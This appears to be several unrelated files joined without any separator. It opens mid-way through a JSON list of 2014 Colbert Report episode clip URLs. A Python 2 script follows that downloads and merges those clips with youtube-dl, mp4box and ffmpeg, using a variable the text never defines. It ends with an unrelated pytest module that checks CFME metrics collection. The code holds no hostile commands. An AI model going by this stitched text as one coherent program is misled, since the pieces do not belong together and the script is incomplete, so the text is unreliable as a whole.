        "http://thecolbertreport.cc.com/videos/wna0mw/global-warming-threatens-bird-species",
        "http://thecolbertreport.cc.com/videos/ndpng7/lonn-taylor",
        "http://thecolbertreport.cc.com/videos/cl9arb/sign-off---jim-cornelison-sings-the-national-anthem"
      ],
      "guest": "Lonn Taylor"
    },
    {
      "date": "2014-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/848h60/the-next-miss-america",
        "http://thecolbertreport.cc.com/videos/lmtq66/the-vote-for-scottish-independence",
        "http://thecolbertreport.cc.com/videos/exs7p5/the-vote-for-scottish-independence---matt-wells",
        "http://thecolbertreport.cc.com/videos/0txz3z/think-tank-corruption",
        "http://thecolbertreport.cc.com/videos/m1a8gr/mindy-kaling",
        "http://thecolbertreport.cc.com/videos/0j1qdb/sign-off"
      ],
      "guest": "Mindy Kaling"
    },
    {
      "date": "2014-09-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/60e467/intro---9-16-14",
        "http://thecolbertreport.cc.com/videos/0agoip/the-kinda-sorta-war-and-the-u-s--s-mysterious-allies",
        "http://thecolbertreport.cc.com/videos/mzktzw/wall-street-meddles-with-restaurant-chain",
        "http://thecolbertreport.cc.com/videos/oyl7ka/unlocking-the-truth"
      ],
      "guest": "Unlocking the Truth"
    },
    {
      "date": "2014-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6d36zv/caped-cash-cows",
        "http://thecolbertreport.cc.com/videos/zryrry/undercover-at-comic-con---prince-hawkcat",
        "http://thecolbertreport.cc.com/videos/d791f1/undercover-at-comic-con---stephen-s-movie-pitches",
        "http://thecolbertreport.cc.com/videos/xq6f9b/military-vehicles-for-public-schools",
        "http://thecolbertreport.cc.com/videos/arckqm/viggo-mortensen",
        "http://thecolbertreport.cc.com/videos/bfflr6/sign-off---aragorn"
      ],
      "guest": "Viggo Mortensen"
    },
    {
      "date": "2014-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hn1ueg/checky",
        "http://thecolbertreport.cc.com/videos/yupbhd/no-boots-on-the-ground-in-iraq",
        "http://thecolbertreport.cc.com/videos/wjga35/sean-hannity-s-defense-of-adrian-peterson",
        "http://thecolbertreport.cc.com/videos/rd6gao/terry-gilliam",
        "http://thecolbertreport.cc.com/videos/148dzu/sign-off---stuffed-elephant"
      ],
      "guest": "Terry Gilliam"
    },
    {
      "date": "2014-09-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uc4f7i/awol-afghan-soldiers",
        "http://thecolbertreport.cc.com/videos/01cyc2/tip-wag---climate-change-marchers---senators-on-reality-tv",
        "http://thecolbertreport.cc.com/videos/x58aop/charles-krauthammer-on-obama-s-mental-state",
        "http://thecolbertreport.cc.com/videos/jq352p/tweedy"
      ],
      "guest": "Tweedy"
    },
    {
      "date": "2014-09-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j6xqew/u-s--airstrikes-in-syria",
        "http://thecolbertreport.cc.com/videos/ybvlae/better-know-a-district---california-s-2nd---jared-huffman",
        "http://thecolbertreport.cc.com/videos/b5ni29/the-russians-buy-pbr",
        "http://thecolbertreport.cc.com/videos/k5a58t/naomi-klein",
        "http://thecolbertreport.cc.com/videos/ksh5pr/sign-off---pbr"
      ],
      "guest": "Naomi Klein"
    },
    {
      "date": "2014-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5mneco/atone-phone---jeff-tweedy-calls",
        "http://thecolbertreport.cc.com/videos/tw7sr5/obama-s-coffee-cup-salute"
      ],
      "guest": "Bill Cosby"
    },
    {
      "date": "2014-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/p49ls4/the-suspicious-death-of-staten-island-chuck",
        "http://thecolbertreport.cc.com/videos/0hjuki/intro---9-25-14",
        "http://thecolbertreport.cc.com/videos/tjmnw0/eric-holder-s-resignation",
        "http://thecolbertreport.cc.com/videos/7dpl33/bill-o-reilly-s-elite-strike-force",
        "http://thecolbertreport.cc.com/videos/0w775u/smile-file---the-u-a-e--s-first-female-fighter-pilot-vs---the-five----uncensored",
        "http://thecolbertreport.cc.com/videos/g36k7p/walter-mischel",
        "http://thecolbertreport.cc.com/videos/fhpqlq/sign-off---marshmallows"
      ],
      "guest": "Walter Mischel"
    },
    {
      "date": "2014-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6ythcp/obama-s-rip-off-of-bush",
        "http://thecolbertreport.cc.com/videos/eecxwy/hillary-clinton-and-the-grandmother-of-all-scandals",
        "http://thecolbertreport.cc.com/videos/6w3vad/kim-jong-un-s-massive-cheese-consumption",
        "http://thecolbertreport.cc.com/videos/ojmtk8/jamie-oliver",
        "http://thecolbertreport.cc.com/videos/z231mw/sign-off---cake-and-cheese"
      ],
      "guest": "Jamie Oliver"
    },
    {
      "date": "2014-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6k6hq3/muslims-in-the-end-zone",
        "http://thecolbertreport.cc.com/videos/h1yge9/highlights-of-the-values-voter-summit",
        "http://thecolbertreport.cc.com/videos/8x6lww/the-benefits-of-pessimism---hans-beinholtz",
        "http://thecolbertreport.cc.com/videos/qofokt/jeffrey-tambor",
        "http://thecolbertreport.cc.com/videos/pnsz05/sign-off---goodnight"
      ],
      "guest": "Jeffrey Tambor"
    },
    {
      "date": "2014-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v6tds1/protests-in-hong-kong",
        "http://thecolbertreport.cc.com/videos/v51zzo/protests-in-hong-kong---louisa-lim",
        "http://thecolbertreport.cc.com/videos/zzbhqi/bill-o-reilly-takes-offense",
        "http://thecolbertreport.cc.com/videos/oviilh/mike-mullen",
        "http://thecolbertreport.cc.com/videos/5tiz1y/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/8f6kuv/exclusive---mike-mullen-extended-interview"
      ],
      "guest": "Adm. Mike Mullen"
    },
    {
      "date": "2014-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jyghug/intro---10-2-14",
        "http://thecolbertreport.cc.com/videos/x6d5sz/deathpocalypse-now---ebola-in-america---50-states-of-grave",
        "http://thecolbertreport.cc.com/videos/hhhqqd/deathpocalypse-now---ebola-in-america---kent-sepkowitz",
        "http://thecolbertreport.cc.com/videos/e72awe/solitocity",
        "http://thecolbertreport.cc.com/videos/ye2fnr/lynn-sherr",
        "http://thecolbertreport.cc.com/videos/7nl6i5/sign-off---hand-sanitizer"
      ],
      "guest": "Lynn Sherr"
    },
    {
      "date": "2014-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g5stw6/intro---10-6-14",
        "http://thecolbertreport.cc.com/videos/heaxbs/victory-for-gay-marriage---the-rise-of-amicus-briefs",
        "http://thecolbertreport.cc.com/videos/ssmvma/victory-for-gay-marriage---the-rise-of-amicus-briefs---allison-orr-larsen",
        "http://thecolbertreport.cc.com/videos/ayvbym/a-rare-correction---no-ebola-outbreak-in-the-u-s-",
        "http://thecolbertreport.cc.com/videos/fcax26/james-m--mcpherson",
        "http://thecolbertreport.cc.com/videos/bfwqfb/sign-off---goodnight"
      ],
      "guest": "James McPherson"
    },
    {
      "date": "2014-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hhqgbw/ebolapalooza",
        "http://thecolbertreport.cc.com/videos/nx3ewk/better-know-a-district---illinois-s-8th---tammy-duckworth",
        "http://thecolbertreport.cc.com/videos/q2857u/cheating-death---pandemic-health",
        "http://thecolbertreport.cc.com/videos/7swpxt/leon-wieseltier",
        "http://thecolbertreport.cc.com/videos/rete59/sign-off---cigarette"
      ],
      "guest": "Leon Wieseltier"
    },
    {
      "date": "2014-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e50viy/intro---10-8-14",
        "http://thecolbertreport.cc.com/videos/khi8w0/john-boehner-vs--america-s-anti-gay-marriage-crusaders",
        "http://thecolbertreport.cc.com/videos/m899eo/naming-the-war-against-isis",
        "http://thecolbertreport.cc.com/videos/hzou6l/carol-burnett",
        "http://thecolbertreport.cc.com/videos/hcc5br/sign-off---ear-tug"
      ],
      "guest": "Carol Burnett"
    },
    {
      "date": "2014-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/blfnlw/exclusive---robert-plant----little-maggie-",
        "http://thecolbertreport.cc.com/videos/jdri4u/robert-plant----rainbow-",
        "http://thecolbertreport.cc.com/videos/tyc0sx/intro---10-9-14",
        "http://thecolbertreport.cc.com/videos/0gscic/columbus-day-under-attack",
        "http://thecolbertreport.cc.com/videos/hpfwm4/raining-vs--sprinkling",
        "http://thecolbertreport.cc.com/videos/xfjyum/republicans-are-people--too",
        "http://thecolbertreport.cc.com/videos/jfanx7/robert-plant",
        "http://thecolbertreport.cc.com/videos/o2y6sr/sign-off----lullaby-and----the-ceaseless-roar-"
      ],
      "guest": "Robert Plant"
    },
    {
      "date": "2014-10-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fhnqjo/midterms--014---detour-to-gridlock---an-exciting-thing-that-i-am-totally-interested-in",
        "http://thecolbertreport.cc.com/videos/8zip3j/intro---10-13-14",
        "http://thecolbertreport.cc.com/videos/sx2hh2/32-episodes-left-for-the-report",
        "http://thecolbertreport.cc.com/videos/fp4xfy/walter-isaacson",
        "http://thecolbertreport.cc.com/videos/f4t3xr/sign-off---quality-time-with-americone-dream",
        "http://thecolbertreport.cc.com/videos/bxbwj4/midterms--014---detour-to-gridlock---dennis-daugaard"
      ],
      "guest": "Walter Isaacson"
    },
    {
      "date": "2014-10-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zg3zai/neil-young----who-s-gonna-stand-up---and-save-the-earth--",
        "http://thecolbertreport.cc.com/videos/wcjcgn/a-week-of-victories-for-gay-rights",
        "http://thecolbertreport.cc.com/videos/akzlpt/say-yes-to-rick-scott",
        "http://thecolbertreport.cc.com/videos/namhpu/neil-young",
        "http://thecolbertreport.cc.com/videos/veswmj/sign-off----special-deluxe-"
      ],
      "guest": "Neil Young"
    },
    {
      "date": "2014-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qw8rwv/who-s-attacking-me-now----larry-page",
        "http://thecolbertreport.cc.com/videos/q2u206/tip-wag---barack-obama---stan-lee",
        "http://thecolbertreport.cc.com/videos/xv3cdl/sean-hannity-s-question-of-the-day",
        "http://thecolbertreport.cc.com/videos/18x57e/justin-simien",
        "http://thecolbertreport.cc.com/videos/4tsbtt/sign-off---goodnight"
      ],
      "guest": "Justin Simien"
    },
    {
      "date": "2014-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uebndp/abandoned-wmds-in-iraq",
        "http://thecolbertreport.cc.com/videos/aywapn/abandoned-wmds-in-iraq---c-j--chivers",
        "http://thecolbertreport.cc.com/videos/3o1uzs/rick-scott-and-charlie-crist-s-bizarre-debate",
        "http://thecolbertreport.cc.com/videos/z4umi5/william-deresiewicz",
        "http://thecolbertreport.cc.com/videos/xrvm7x/stephen-s-old-ipod"
      ],
      "guest": "Bill Deresiewicz"
    },
    {
      "date": "2014-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e27u8w/intro---10-27-14",
        "http://thecolbertreport.cc.com/videos/8hjpi2/ebola-in-new-york",
        "http://thecolbertreport.cc.com/videos/whfeyg/louie-gohmert-on-gays-in-the-military",
        "http://thecolbertreport.cc.com/videos/jjpinj/meredith-vieira",
        "http://thecolbertreport.cc.com/videos/a0zbrf/sign-off---sundae"
      ],
      "guest": "Meredith Vieira"
    },
    {
      "date": "2014-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xxvx4u/war-on-halloween---flaming-bags-of-government",
        "http://thecolbertreport.cc.com/videos/jxddq4/the-nra-vs--pennsylvania-s-pet-eating-ban",
        "http://thecolbertreport.cc.com/videos/6cj1fk/tom-corbett-s-photoshopped-diversity",
        "http://thecolbertreport.cc.com/videos/nzy3nz/sport-report---fall-experimental-football-league",
        "http://thecolbertreport.cc.com/videos/c7wjzg/michael-lewis",
        "http://thecolbertreport.cc.com/videos/64x2gg/sign-off---goodnight"
      ],
      "guest": "Michael Lewis"
    },
    {
      "date": "2014-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ladjef/gamergate",
        "http://thecolbertreport.cc.com/videos/wr7hqq/gamergate---anita-sarkeesian",
        "http://thecolbertreport.cc.com/videos/ll1e16/heroism-in-canada",
        "http://thecolbertreport.cc.com/videos/1h66nr/jill-lepore",
        "http://thecolbertreport.cc.com/videos/1fc6m9/sign-off---microphone"
      ],
      "guest": "Jill Lepore"
    },
    {
      "date": "2014-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qvw67z/intro---10-30-14",
        "http://thecolbertreport.cc.com/videos/hxvn8w/-america-again--in-paperback",
        "http://thecolbertreport.cc.com/videos/365nm9/america-s-midterm-indifference---george-takei",
        "http://thecolbertreport.cc.com/videos/cykxut/the-perils-of-anchor-zygotes",
        "http://thecolbertreport.cc.com/videos/tqbn3t/david-miliband",
        "http://thecolbertreport.cc.com/videos/4rgfpm/sign-off---goodnight"
      ],
      "guest": "David Miliband"
    },
    {
      "date": "2014-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cvjwus/intro---11-3-14",
        "http://thecolbertreport.cc.com/videos/p6uab8/midterms--014---detour-to-gridlock---midterm-flyer-of-shame",
        "http://thecolbertreport.cc.com/videos/qmg04s/tip-wag---nazi-dairy-products--tim-cook---prostate-health-researchers",
        "http://thecolbertreport.cc.com/videos/rw2v1b/stephen-colbert-s-enchanted-princess-pixie-wedding-cake",
        "http://thecolbertreport.cc.com/videos/lffyr9/chuck-todd",
        "http://thecolbertreport.cc.com/videos/xrfsl8/sign-off---goodnight"
      ],
      "guest": "Chuck Todd"
    },
    {
      "date": "2014-11-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1g0aji/midterms--014---detour-to-gridlock---live-coverage",
        "http://thecolbertreport.cc.com/videos/cmr0z4/midterms--014---detour-to-gridlock---mountains-of-midterm-madness",
        "http://thecolbertreport.cc.com/videos/w3muth/midterms--014---detour-to-gridlock---social-tracker-8700",
        "http://thecolbertreport.cc.com/videos/ekj19q/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/ckxbqk/sign-off---stephen-s-last-election-special"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2014-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c5okdm/intro---11-5-14",
        "http://thecolbertreport.cc.com/videos/ywqnjy/the-republicans-win-everything",
        "http://thecolbertreport.cc.com/videos/wq84nn/better-know-a-district---california-s-13th---barbara-lee",
        "http://thecolbertreport.cc.com/videos/7feu8t/legalized-marijuana-in-washington--d-c-",
        "http://thecolbertreport.cc.com/videos/w2qs7x/kirsten-gillibrand",
        "http://thecolbertreport.cc.com/videos/tno5bj/sign-off---goodnight"
      ],
      "guest": "Sen. Kirsten Gillibrand"
    },
    {
      "date": "2014-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kk2x1a/intro---11-6-14",
        "http://thecolbertreport.cc.com/videos/rtdlsr/busted-for-feeding-the-homeless",
        "http://thecolbertreport.cc.com/videos/3rw0tz/cheating-death---aging---women-s-health",
        "http://thecolbertreport.cc.com/videos/sc6mpp/the-republicans--inspiring-climate-change-message",
        "http://thecolbertreport.cc.com/videos/v06v9z/steven-johnson",
        "http://thecolbertreport.cc.com/videos/yzaj23/sign-off---goodnight"
      ],
      "guest": "Steven Johnson"
    },
    {
      "date": "2014-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/erbk9q/intro---11-10-14",
        "http://thecolbertreport.cc.com/videos/xnwueh/big-news-from-the-hermit-kingdom",
        "http://thecolbertreport.cc.com/videos/avadrz/the-word---it-s-a-trap-",
        "http://thecolbertreport.cc.com/videos/87vgoo/adventures-in-snackology",
        "http://thecolbertreport.cc.com/videos/sbmlul/andy-cohen",
        "http://thecolbertreport.cc.com/videos/7uog9s/sign-off---goodnight"
      ],
      "guest": "Andy Cohen"
    },
    {
      "date": "2014-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mnkz05/intro---11-11-14",
        "http://thecolbertreport.cc.com/videos/wht7i8/uncertain-death-for-isis-s-leader",
        "http://thecolbertreport.cc.com/videos/thgfth/blowback-from-obama-s-visit-to-china",
        "http://thecolbertreport.cc.com/videos/uqricc/tip-wag---breitbart",
        "http://thecolbertreport.cc.com/videos/41fe1h/diane-von-furstenberg",
        "http://thecolbertreport.cc.com/videos/ncl44x/sign-off---cheerful-reflection"
      ],
      "guest": "Diane Von Furstenberg"
    },
    {
      "date": "2014-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/80wk4b/intro---11-12-14",
        "http://thecolbertreport.cc.com/videos/a1b4ph/new-york-city-s-rat-deficiency",
        "http://thecolbertreport.cc.com/videos/rn92gg/stephen-colbert-s-auto-robotic-fixation",
        "http://thecolbertreport.cc.com/videos/hhmb28/mr--smith-goes-to-the-state-legislature--then-later-possibly-washington---gordon-klingenschmitt",
        "http://thecolbertreport.cc.com/videos/6wtwlg/terence-tao",
        "http://thecolbertreport.cc.com/videos/a1eex6/sign-off---red-wine"
      ],
      "guest": "Terence Tao"
    },
    {
      "date": "2014-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jtbvle/reforming-health-care-reform",
        "http://thecolbertreport.cc.com/videos/fe3wjm/reforming-health-care-reform---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/cvq86c/gay-marriage-victory-in-south-carolina",
        "http://thecolbertreport.cc.com/videos/3pu1ey/jennifer-lawrence",
        "http://thecolbertreport.cc.com/videos/9aqahd/sign-off---goodnight"
      ],
      "guest": "Jennifer Lawrence"
    },
    {
      "date": "2014-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qed7bp/bono-s-missing-luggage",
        "http://thecolbertreport.cc.com/videos/9dr12d/survival-tips-from--good-morning-america-",
        "http://thecolbertreport.cc.com/videos/7vjzxb/bernie-sanders-pt--1",
        "http://thecolbertreport.cc.com/videos/67tlr7/bernie-sanders-pt--2",
        "http://thecolbertreport.cc.com/videos/uqho5w/sign-off---goodnight"
      ],
      "guest": "Sen. Bernie Sanders"
    },
    {
      "date": "2014-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fys4c2/intro---11-18-14",
        "http://thecolbertreport.cc.com/videos/ib2b3k/polar-plunge",
        "http://thecolbertreport.cc.com/videos/iw2iwg/obama-s-immigration-plan---esteban-colberto",
        "http://thecolbertreport.cc.com/videos/bbfckz/tip-wag---salvage-stores---maine",
        "http://thecolbertreport.cc.com/videos/o8su6y/eva-longoria",
        "http://thecolbertreport.cc.com/videos/vu8jpe/sign-off---goodnight"
      ],
      "guest": "Eva Longoria"
    },
    {
      "date": "2014-11-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7mkltp/simulated-school-attack-in-florida",
        "http://thecolbertreport.cc.com/videos/dvppp6/difference-makers---the-free-keene-squad",
        "http://thecolbertreport.cc.com/videos/sdqbxm/black-friday-sale",
        "http://thecolbertreport.cc.com/videos/9yc4ry/toni-morrison",
        "http://thecolbertreport.cc.com/videos/y4ygag/sign-off---goodnight"
      ],
      "guest": "Toni Morrison"
    },
    {
      "date": "2014-11-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/01iemp/obama-s-executive-amnesty",
        "http://thecolbertreport.cc.com/videos/fie7ef/threatdown---declining-standards-of-sexiness--people-who-eat-chocolate---invaders-of-the-new-world",
        "http://thecolbertreport.cc.com/videos/e55wo4/jon-stewart-pt--1",
        "http://thecolbertreport.cc.com/videos/vbi9v5/jon-stewart-pt--2",
        "http://thecolbertreport.cc.com/videos/zwcggy/sign-off---goodnight"
      ],
      "guest": "Jon Stewart"
    },
    {
      "date": "2014-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wmtufg/intro---12-1-14",
        "http://thecolbertreport.cc.com/videos/umsrnb/lightsaber-controversy",
        "http://thecolbertreport.cc.com/videos/wud7e1/ferguson-fallout-and-the-st--louis-rams",
        "http://thecolbertreport.cc.com/videos/d6xq50/jihadis-of-the-high-seas",
        "http://thecolbertreport.cc.com/videos/3h1qqa/john-mccain",
        "http://thecolbertreport.cc.com/videos/dnrg1a/sign-off---goodnight"
      ],
      "guest": "Sen. John McCain"
    },
    {
      "date": "2014-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v8mtsf/intro---12-2-14",
        "http://thecolbertreport.cc.com/videos/hyqrm1/announcing-the-mr--colbert-goes-to-washington-special",
        "http://thecolbertreport.cc.com/videos/ethq4d/the-word---crook-and-ladder",
        "http://thecolbertreport.cc.com/videos/lje2l4/blitzkrieg-on-grinchitude---mistletoe-drones",
        "http://thecolbertreport.cc.com/videos/z0hz76/tony-bennett-and-lady-gaga"
      ],
      "guest": "Tony Bennett &amp; Lady Gaga"
    },
    {
      "date": "2014-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c9s1cs/intro---12-3-14",
        "http://thecolbertreport.cc.com/videos/nxwili/the-no-social-security-for-nazis-act",
        "http://thecolbertreport.cc.com/videos/ziipwv/thought-for-food---fairlife-milk---pizza-hut-s-subconscious-menu",
        "http://thecolbertreport.cc.com/videos/fpdlpw/surprise-visit-from-amy-sedaris",
        "http://thecolbertreport.cc.com/videos/4r9o52/christopher-nolan",
        "http://thecolbertreport.cc.com/videos/nwo3n2/sign-off---goodnight"
      ],
      "guest": "Christopher Nolan"
    },
    {
      "date": "2014-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ik935r/president-barack-obama-to-appear-on-the-report",
        "http://thecolbertreport.cc.com/videos/d5k5nz/outrage-over-eric-garner-decision",
        "http://thecolbertreport.cc.com/videos/pxune6/obama-s-bold-and-beautiful-ambassador-pick",
        "http://thecolbertreport.cc.com/videos/nucbbu/paul-farmer",
        "http://thecolbertreport.cc.com/videos/82d47r/sign-off---grimmy"
      ],
      "guest": "Dr. Paul Farmer"
    },
    {
      "date": "2014-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u8bqev/mr--colbert-goes-to-washington",
        "http://thecolbertreport.cc.com/videos/cnlqbr/better-know-a-america---the-fightin--us",
        "http://thecolbertreport.cc.com/videos/88p9oh/the-word---president-barack-obama---to-health-in-a-handbasket",
        "http://thecolbertreport.cc.com/videos/i14vel/president-barack-obama-pt--1",
        "http://thecolbertreport.cc.com/videos/mpmtan/president-barack-obama-pt--2",
        "http://thecolbertreport.cc.com/videos/3mcn6y/sign-off---see-ya",
        "http://thecolbertreport.cc.com/videos/4mkbqz/exclusive---president-barack-obama-extended-interview"
      ],
      "guest": "President Barack Obama"
    },
    {
      "date": "2014-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tgnj0t/-eaten-alive--outrage",
        "http://thecolbertreport.cc.com/videos/vd3icz/better-know-a-district---georgia-s-1st---reuniting-with-rep--jack-kingston",
        "http://thecolbertreport.cc.com/videos/pz35hw/who-s-honoring-me-now----entertainment-weekly",
        "http://thecolbertreport.cc.com/videos/2kz4pi/james-corden",
        "http://thecolbertreport.cc.com/videos/0frj3t/sign-off---sting"
      ],
      "guest": "James Corden"
    },
    {
      "date": "2014-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kquici/cia-torture-report",
        "http://thecolbertreport.cc.com/videos/rlpjf5/cia-torture-report---pundits-defend-america",
        "http://thecolbertreport.cc.com/videos/z4grj8/cia-torture-report---tom-blanton",
        "http://thecolbertreport.cc.com/videos/8i6klx/sarah-koenig",
        "http://thecolbertreport.cc.com/videos/im3k81/sign-off---headphones"
      ],
      "guest": "Sarah Koenig"
    },
    {
      "date": "2014-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/anckrc/scott-walker-s-hanukkah-gaffe",
        "http://thecolbertreport.cc.com/videos/399enl/yahweh-or-no-way---epic-casting-controversy",
        "http://thecolbertreport.cc.com/videos/p9nk9d/announcing-the-colbert-report-raffle",
        "http://thecolbertreport.cc.com/videos/509747/smaug",
        "http://thecolbertreport.cc.com/videos/mfxigz/sign-off---aftermath-of-smaug"
      ],
      "guest": "\"The Hobbit: Battle of the Five Armies\" special"
    },
    {
      "date": "2014-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bt8vk8/intro---12-15-14",
        "http://thecolbertreport.cc.com/videos/lwna3x/michele-bachmann-s-extreme-holiday-cheer",
        "http://thecolbertreport.cc.com/videos/0frisd/formidable-opponent---torture-report",
        "http://thecolbertreport.cc.com/videos/9xetgg/kim-jong-un-s-exclusive-name---sony-s-hack-attack",
        "http://thecolbertreport.cc.com/videos/j9u5in/seth-rogen",
        "http://thecolbertreport.cc.com/videos/bhrczk/sign-off---goodnight"
      ],
      "guest": "Seth Rogen"
    },
    {
      "date": "2014-12-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/arfo3o/jeb-bush-s-presidential-ambitions",
        "http://thecolbertreport.cc.com/videos/tnwzte/oil-war---jason-bordoff",
        "http://thecolbertreport.cc.com/videos/vd8ci4/colbert-platinum---holiday-gift-edition",
        "http://thecolbertreport.cc.com/videos/w5h8eb/kendrick-lamar",
        "http://thecolbertreport.cc.com/videos/pjrqsj/kendrick-lamar---debut-of-untitled-track"
      ],
      "guest": "Kendrick Lamar"
    }
  ]
}


working_folder = 'G:/Downloads'
for colbDate in testP['2014']:
    if 1:
        newfileResize = 'G:/downloads/The Colbert Report 2014/TheColbertReport '+colbDate['date']+'.mp4'
        if not os.path.exists(newfileResize):
            folderName = 'G:/downloads/The Colbert Report 2014/'+colbDate['date']
            try:
                os.mkdir(folderName)
            except:
                pass
            pos = 0
        
            for vid in colbDate['videos']:
                pos+=1
                done = False            
                while not done:
                    folderContents = os.listdir(folderName)                
                    for folderContent in folderContents:
                        if folderContent.startswith(str(pos)+' ') and (not folderContent.endswith('.part')):
                            done = True
                    
                    if not done:
                        cmd = os.path.join(working_folder,'youtube-dl.exe') + ' --no-continue -o "'+folderName+'/'+str(pos)+' %(title)s.%(ext)s" '+vid
                        subprocess.call(cmd,shell=True)
            vids = []
            for vid in os.listdir(folderName):
                if vid.endswith('.mp4'):
                    vids.append(os.path.join(folderName,vid))
            vids.sort()
            newfile = 'G:/downloads/The Colbert Report 2014/TheColbertReport '+colbDate['date']+'temp.mp4'
            
            if not os.path.exists(newfileResize):            
                cmd = r' -cat "' + r'" -cat "'.join(vids) + r'" -new "'+newfile+'"'
                exc = "G:/Downloads/mp4box.exe -tmp G:/temp/ " + cmd
                subprocess.call(exc,shell=True)
                cmd = "G:/Downloads/ffmpeg/bin/ffmpeg.exe -i \"" + newfile + "\" -vf scale=1024:576 \""+newfileResize+"\""
                subprocess.call(cmd,shell=True)
                while os.path.exists(newfile):
                    try:
                        os.remove(newfile)
                    except:
                        pass
            else:
                print 'file found ' + newfile
        
        
                 
     


# -*- coding: utf-8 -*-

import random
from operator import attrgetter

import pytest

from cfme import test_requirements
from cfme.cloud.provider import CloudProvider
from cfme.cloud.provider.azure import AzureProvider
from cfme.cloud.provider.ec2 import EC2Provider
from cfme.cloud.provider.gce import GCEProvider
from cfme.cloud.provider.openstack import OpenStackProvider
from cfme.common.provider import BaseProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from cfme.utils import conf
from cfme.utils.blockers import BZ
from cfme.utils.log import logger
from cfme.utils.wait import wait_for
from cfme.fixtures.provider import setup_or_skip

# Applied to every test in this module: tier-1, the C&U test requirement,
# and a module-scoped provider parametrization limited to providers whose
# cap_and_util config declares a 'cu-24x7' capandu VM.
pytestmark = [
    pytest.mark.tier(1),
    test_requirements.c_and_u,
    pytest.mark.provider(
        [VMwareProvider, RHEVMProvider, EC2Provider, OpenStackProvider, AzureProvider, GCEProvider],
        required_fields=[(['cap_and_util', 'capandu_vm'], 'cu-24x7')], scope="module")
]


@pytest.fixture(scope="module")
def clean_setup_provider(request, provider):
    """Module-scoped fixture: clear all providers, set up (or skip on)
    the parametrized provider, and clear providers again on teardown."""
    BaseProvider.clear_providers()
    setup_or_skip(request, provider)
    yield
    BaseProvider.clear_providers()


def vm_count(appliance, metrics_tbl, mgmt_system_id):
    """Return True if any VM/template metrics rows exist for the given provider id."""
    session = appliance.db.client.session
    rows = (
        session.query(metrics_tbl)
        .filter(metrics_tbl.parent_ems_id == mgmt_system_id)
        .filter(metrics_tbl.resource_type == "VmOrTemplate")
    )
    return bool(rows.count())


def host_count(appliance, metrics_tbl, mgmt_system_id):
    """Return True if any host metrics rows exist for the given provider id."""
    session = appliance.db.client.session
    rows = (
        session.query(metrics_tbl)
        .filter(metrics_tbl.parent_ems_id == mgmt_system_id)
        .filter(metrics_tbl.resource_type == "Host")
    )
    return bool(rows.count())


@pytest.fixture(scope="module")
def metrics_collection(appliance, clean_setup_provider, provider, enable_candu):
    """Check the db is gathering collection data for the given provider.

    Waits until metrics rows appear for VMs (all providers) and for
    hosts (infra providers only).

    Metadata:
        test_flag: metrics_collection
    """
    metrics_tbl = appliance.db.client['metrics']
    mgmt_systems_tbl = appliance.db.client['ext_management_systems']

    logger.info("Fetching provider ID for %s", provider.key)
    mgmt_system_id = appliance.db.client.session.query(mgmt_systems_tbl).filter(
        mgmt_systems_tbl.name == conf.cfme_data.get('management_systems', {})[provider.key]['name']
    ).first().id

    logger.info("ID fetched; testing metrics collection now")

    # VMs exist for both infra and cloud providers
    wait_for(
        vm_count, [appliance, metrics_tbl, mgmt_system_id],
        delay=20,
        timeout=1500,
        fail_condition=False,
        message="wait for VMs")

    # Hosts exist only for infra providers
    if provider.category == "infra":
        wait_for(
            # BUG FIX: this previously waited on vm_count again, so host
            # metrics collection was never actually verified.
            host_count, [appliance, metrics_tbl, mgmt_system_id],
            delay=20,
            timeout=1500,
            fail_condition=False,
            message="wait for hosts.")


